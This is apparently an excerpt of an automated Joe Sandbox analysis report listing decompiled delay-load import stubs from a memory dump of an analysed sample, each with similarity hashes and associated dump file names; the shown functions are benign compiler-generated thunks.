Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9800529396552f2ea95790ffe5502dfde2456339348d8d5d2128d9a62360fd45
Instruction ID: f1a1d5290d9fc4bc9d820ccd915a9ee133e965eca20168ba330c8c88b4b5dd15
Opcode Fuzzy Hash: 9800529396552f2ea95790ffe5502dfde2456339348d8d5d2128d9a62360fd45
Instruction Fuzzy Hash: 3DB012D2358140BC3244D2051C03E3705CCC8C8F10370C1FEF83DD1580E840EC441432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E20A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E20A() {

				E00B7E85D(0xb9c5ec, 0xbc3154); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fb4b745fdae1c7c65da7955a7b11b0041b8942bc46962ec766c1997b1b5f913c
Instruction ID: ca0c3173f99360b1d130d160ef0cae4308a29ab5f4f8559f06ef56b7c6cf849e
Opcode Fuzzy Hash: fb4b745fdae1c7c65da7955a7b11b0041b8942bc46962ec766c1997b1b5f913c
Instruction Fuzzy Hash: A7B012D2258000BC3204D2061D03E3705CCC8C8F10370C0FEF83DD1580EC50ED092432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E264 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E264() {

				E00B7E85D(0xb9c5ec, 0xbc3130); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2c5818a93bd9904f150e98bbeca658975d811e228d41e999be458bd50d0d92ef
Instruction ID: 693899afadafb43eec321ccb7fba7ca29b703c64b9d7773f90354e414508444d
Opcode Fuzzy Hash: 2c5818a93bd9904f150e98bbeca658975d811e228d41e999be458bd50d0d92ef
Instruction Fuzzy Hash: 36B012D2269040BC3244D1051C03E3705CDDCC8F10370C0FEF83ED1480E840EC001432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E26E Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E26E() {

				E00B7E85D(0xb9c5ec, 0xbc312c); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 122ec9b6b997f833c8cdd9656d72001a90fcc271fa0f6f8c2352494aced0f37e
Instruction ID: 70251689423d81063ed14acf952184186b249b14fedbf34747f6b16a734882ec
Opcode Fuzzy Hash: 122ec9b6b997f833c8cdd9656d72001a90fcc271fa0f6f8c2352494aced0f37e
Instruction Fuzzy Hash: 0BB012D2258000BC3204E1151C43E3705CCC8C9F11370C0FEFC3DD1480E940EC001432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E250 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E250() {

				E00B7E85D(0xb9c5ec, 0xbc3138); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4aec3f55de3243dc79cdeb5b46eedec05e14a76b708ac3dde93a6f569e03f698
Instruction ID: 10b78d2a793835f3cba074d433f30562a090349a08b8e5f786d56c7999881b72
Opcode Fuzzy Hash: 4aec3f55de3243dc79cdeb5b46eedec05e14a76b708ac3dde93a6f569e03f698
Instruction Fuzzy Hash: 23B012E2259140BC3284D2051C03E3705CDC8C8F10370C1FEF83DD1480E840EC441432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E246 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E246() {

				E00B7E85D(0xb9c5ec, 0xbc313c); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 952eb217a197628c78213e9bdb068a3d15f10272706720d283cdeb8d61608032
Instruction ID: 9d746623245f4ca3d6f94221809b49e2af3a8c0959c79f8ac0417ec13b529326
Opcode Fuzzy Hash: 952eb217a197628c78213e9bdb068a3d15f10272706720d283cdeb8d61608032
Instruction Fuzzy Hash: CAB012D2299040BC3244E1051C03E3705CDC8C9F10370C0FEFC3DD1480E840EC001432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E423 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E423() {

				E00B7E85D(0xb9c60c, 0xbc304c); // executed
				goto __eax;
			}

0x00b7e3fc
0x00b7e403

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E3FC

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f7b09795363225dfee097c667d7febe5ba2e6956394881f4e05e587e5e306347
Instruction ID: f0e99c2fed5d83871605a45c6d26c3f58c43687f50c38d4b522de423eade7c83
Opcode Fuzzy Hash: f7b09795363225dfee097c667d7febe5ba2e6956394881f4e05e587e5e306347
Instruction Fuzzy Hash: 03B092A3258000BD3284A1051802E3602D8C889F10320C0EEB838C6080E8408A000433

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E419 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E419() {

				E00B7E85D(0xb9c60c, 0xbc3054); // executed
				goto __eax;
			}

0x00b7e3fc
0x00b7e403

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E3FC

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9690720b92075d6f111417705338d72fc8c9d0cb464cdd31cf54c79d6caabbc2
Instruction ID: 351fe9bfe1998aa4ad6fff0ddf0ef01d63aa95f80c925cca4340507d3b879a7c
Opcode Fuzzy Hash: 9690720b92075d6f111417705338d72fc8c9d0cb464cdd31cf54c79d6caabbc2
Instruction Fuzzy Hash: 12B012E32580007C324491051D02F3702DCC8C9F10330C0FEF53CC6080E8408C091437

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E44B Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E44B() {

				E00B7E85D(0xb9c60c, 0xbc305c); // executed
				goto __eax;
			}

0x00b7e3fc
0x00b7e403

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E3FC

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3adf4159621d5559d8c1d031af19ecbb465a5ef1ed785ca9218a884eb1bc7fe2
Instruction ID: 6cc38c772376a618624dd8f785536fea7cc80bf7e3a27b917070fbc86cd90712
Opcode Fuzzy Hash: 3adf4159621d5559d8c1d031af19ecbb465a5ef1ed785ca9218a884eb1bc7fe2
Instruction Fuzzy Hash: 2CB092A2258000AC3244A1051802E3602D8C889B10320C0EEB838C6080E84088040437

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E5B1 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E5B1() {

				E00B7E85D(0xb9c68c, 0xbc3178); // executed
				goto __eax;
			}

0x00b7e580
0x00b7e587

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E580

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 91c2bce31f44dbe32266bec6b436d84656fd46a71d349318278ce69178080423
Instruction ID: 0cfc87b516e7571b1cd48c0b08aafbe8c2dedcc8bd9616c48dc81ec5f5f1bc94
Opcode Fuzzy Hash: 91c2bce31f44dbe32266bec6b436d84656fd46a71d349318278ce69178080423
Instruction Fuzzy Hash: DDB012C22581007C334452545C03E3701ECC8C9F10334C2FEF43CD6080F8408C400436

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E5A7 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E5A7() {

				E00B7E85D(0xb9c68c, 0xbc3174); // executed
				goto __eax;
			}

0x00b7e580
0x00b7e587

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E580

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0a126f2841fe0ee37f3cbbd2519ea80d7685ea4429d184c804b8014853f520dc
Instruction ID: c25f95a3cb2d3070566f3ea71a3209203657c9ac15ebecfb5dcdb5dae3554ee0
Opcode Fuzzy Hash: 0a126f2841fe0ee37f3cbbd2519ea80d7685ea4429d184c804b8014853f520dc
Instruction Fuzzy Hash: 08B012C22580007C330452555D02E3701ECC8C9F10374C2FEF43CD6080FC408D010436

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E593 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E593() {

				E00B7E85D(0xb9c68c, 0xbc3180); // executed
				goto __eax;
			}

0x00b7e580
0x00b7e587

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E580

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dec8b4de7a8c90c7e945b90eb2f06db7de5e9fd467b01230360a050ce93352e0
Instruction ID: 23851c1fe647f057915c2f13c4509aedd3d054a4fe4fc661378dd5c6ac453cbc
Opcode Fuzzy Hash: dec8b4de7a8c90c7e945b90eb2f06db7de5e9fd467b01230360a050ce93352e0
Instruction Fuzzy Hash: ECB012C22580047D330452541C02E3701DCC8C8F10331C0FEF43CD6080F8408C000437

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E532 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E532() {

				E00B7E85D(0xb9c66c, 0xbc3080); // executed
				goto __eax;
			}

0x00b7e51f
0x00b7e526

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E51F

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 688405efa1bee280c5add1346e09ddf6821101c79c54bd0f03fa758917972a1b
Instruction ID: 2cdb493a0819c6d1c0e487311cc90dd05ac856bf5007beac900c28953b773bfe
Opcode Fuzzy Hash: 688405efa1bee280c5add1346e09ddf6821101c79c54bd0f03fa758917972a1b
Instruction Fuzzy Hash: EDB099822A8000BE2208A2082A02F3A0AE8C88AF203A0C0EEF838C2080A8808C000832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E528 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E528() {

				E00B7E85D(0xb9c66c, 0xbc3084); // executed
				goto __eax;
			}

0x00b7e51f
0x00b7e526

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E51F

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cd9263693a44513f2fbc5632376a27e139f3b5182a3dbb50f6d980bfc0a42cd7
Instruction ID: a2787736934a122a0da41ce6400942c080f202ad53333a072028eeab65da25cb
Opcode Fuzzy Hash: cd9263693a44513f2fbc5632376a27e139f3b5182a3dbb50f6d980bfc0a42cd7
Instruction Fuzzy Hash: 5FB092822580406C220451081A02E3A0AD8C88AF10360C0EEB438C1080A8418C010432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E50D Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E50D() {

				E00B7E85D(0xb9c66c, 0xbc3090); // executed
				goto __eax;
			}

0x00b7e51f
0x00b7e526

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E51F

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d07b95389448d5567435dde50ba8e5c28b204ec1426297d57d52b53f15c846c6
Instruction ID: bbb19eee3d56e707b611f9d69d1baca8b360dfb9e049e94b152dffbe1da70866
Opcode Fuzzy Hash: d07b95389448d5567435dde50ba8e5c28b204ec1426297d57d52b53f15c846c6
Instruction Fuzzy Hash: 89B012C32581007C330411241D16F3B06DCC8C6F10770C0FEF438C0481B8418D040432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E546 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E546() {

				E00B7E85D(0xb9c66c, 0xbc3078); // executed
				goto __eax;
			}

0x00b7e51f
0x00b7e526

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E51F

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

